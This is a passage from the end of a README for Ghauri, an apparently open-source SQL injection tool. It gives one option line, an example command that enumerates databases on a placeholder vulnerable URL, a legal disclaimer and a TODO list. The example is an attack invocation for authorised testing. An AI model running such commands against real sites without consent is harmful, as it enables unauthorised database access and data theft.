  --stop              Retrive entries till offset for dbs/tables/columns/dump

Example:
  ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws. 
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

• Add support for inline queries.
• Add support for Union based queries